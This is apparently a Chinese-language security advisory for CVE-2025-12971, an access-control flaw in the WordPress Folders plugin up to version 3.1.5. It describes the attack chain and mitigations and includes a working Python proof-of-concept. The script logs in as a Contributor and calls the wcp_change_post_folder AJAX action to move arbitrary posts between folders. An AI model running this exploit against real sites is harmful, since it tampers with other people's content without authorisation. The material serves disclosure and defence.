CVE-2025-12971 WordPress Folders插件权限绕过导致未授权文件夹操作

漏洞信息

漏洞编号

CVE-2025-12971

漏洞类型

权限绕过/不安全的访问控制

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager (WordPress插件)

漏洞概述

CVE-2025-12971是WordPress平台上一款名为"Folders"的流行插件存在的安全漏洞。该插件被广泛应用于组织和管理WordPress网站中的媒体库、页面、文章和文件，允许用户创建无限数量的文件夹来整理内容。然而，在3.1.5及以下所有版本中，由于'wcp_change_post_folder'函数的权限检查配置不当，导致低权限用户（如Contributor角色）可以执行超出其权限范围的操作。攻击者可以利用此漏洞将任意文件夹中的内容移动到其他任意文件夹中，造成数据混乱或潜在的敏感信息泄露风险。该漏洞的CVSS评分为4.3，属于中等严重程度，主要影响需要管理文件夹内容的WordPress多用户网站环境。

技术细节

该漏洞的根本原因在于WordPress插件的'wcp_change_post_folder'函数缺少正确的权限验证机制。在正常的WordPress权限体系中，不同角色（如Subscriber、Contributor、Author、Editor、Administrator）拥有不同的操作权限。Contributor角色的用户通常只能撰写和管理自己的文章，无法操作其他用户的内容或执行高级管理功能。然而，由于该函数在实现时错误地使用了current_user_can()检查或完全缺少权限验证，导致任何已认证用户（即使只有最低的Contributor权限）都能调用此函数。攻击者可以通过构造特定的AJAX请求，将任意文章的文件夹归属从一个文件夹移动到另一个文件夹。这种未授权的数据修改操作可能被用于：(1) 破坏网站的文档组织结构；(2) 将敏感内容移动到可公开访问的位置；(3) 在多站点环境中造成跨站点的文件夹内容混乱。漏洞影响版本从插件的最初版本一直延续到3.1.5版本。

攻击链分析

STEP 1

1. 信息收集

攻击者首先识别目标网站是否使用存在漏洞的WordPress Folders插件（版本<=3.1.5），并确认该插件已启用

STEP 2

2. 账户获取

攻击者获取一个具有Contributor级别或更高权限的WordPress账户，可以是已注册用户账户或通过其他方式（如社会工程学、凭证填充攻击）获得

STEP 3

3. 构造恶意请求

攻击者构造一个针对wp-admin/admin-ajax.php的AJAX请求，action参数设置为'wcp_change_post_folder'，并指定目标post_id和folder_id

STEP 4

4. 利用权限绕过

由于'wcp_change_post_folder'函数缺少正确的current_user_can()权限检查，服务器接受该请求并执行文件夹移动操作

STEP 5

5. 数据篡改

攻击者成功将任意文章或页面从原文件夹移动到指定的目标文件夹，造成网站内容组织混乱或潜在的数据泄露

STEP 6

6. 持久化访问

攻击者可以重复此操作，将更多内容移动到攻击者控制的文件夹，或设置自动化脚本进行批量操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# WordPress Folders Plugin CVE-2025-12971 PoC
# Misconfigured capability check on 'wcp_change_post_folder'
# Requires Contributor-level access or higher

import requests
import sys

def exploit_cve_2025_12971(target_url, username, password, post_id, source_folder_id, target_folder_id):
    """
    Exploit WordPress Folders plugin vulnerability
    
    Args:
        target_url: Target WordPress site URL
        username: WordPress username (Contributor role or higher)
        password: WordPress password
        post_id: ID of post to move
        source_folder_id: Source folder ID
        target_folder_id: Target folder ID
    """
    
    # Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    
    print(f"[*] Logging in as {username}...")
    response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Login failed!")
        return False
    
    print("[+] Login successful!")
    
    # Exploit the vulnerable endpoint
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # The vulnerable function: wcp_change_post_folder
    exploit_data = {
        'action': 'wcp_change_post_folder',
        'post_id': post_id,
        'folder_id': target_folder_id,
        'old_folder_id': source_folder_id
    }
    
    print(f"[*] Exploiting wcp_change_post_folder vulnerability...")
    print(f"[*] Moving post {post_id} from folder {source_folder_id} to folder {target_folder_id}")
    
    response = session.post(exploit_url, data=exploit_data)
    
    if response.status_code == 200:
        print("[+] Exploit request sent successfully!")
        print(f"[*] Response: {response.text}")
        return True
    else:
        print(f"[-] Exploit failed with status code: {response.status_code}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 7:
        print("Usage: python cve-2025-12971.py <target_url> <username> <password> <post_id> <source_folder_id> <target_folder_id>")
        print("Example: python cve-2025-12971.py http://example.com contributor password 123 1 99")
        sys.exit(1)
    
    target_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    post_id = sys.argv[4]
    source_folder_id = sys.argv[5]
    target_folder_id = sys.argv[6]
    
    exploit_cve_2025_12971(target_url, username, password, post_id, source_folder_id, target_folder_id)

影响范围

Folders WordPress插件 <= 3.1.5（所有版本均受影响）

防御指南

临时缓解措施

如果无法立即升级插件，可以采取以下临时缓解措施：(1) 临时禁用Folders插件直到完成升级；(2) 限制新用户注册功能，防止攻击者注册低权限账户；(3) 监控wp-admin/admin-ajax.php的请求日志，特别关注action为'wcp_change_post_folder'的异常请求；(4) 考虑使用WordPress的角色管理器插件严格限制Contributor角色的权限；(5) 对/wp-admin/admin-ajax.php实施访问控制，只允许管理员访问敏感的AJAX操作。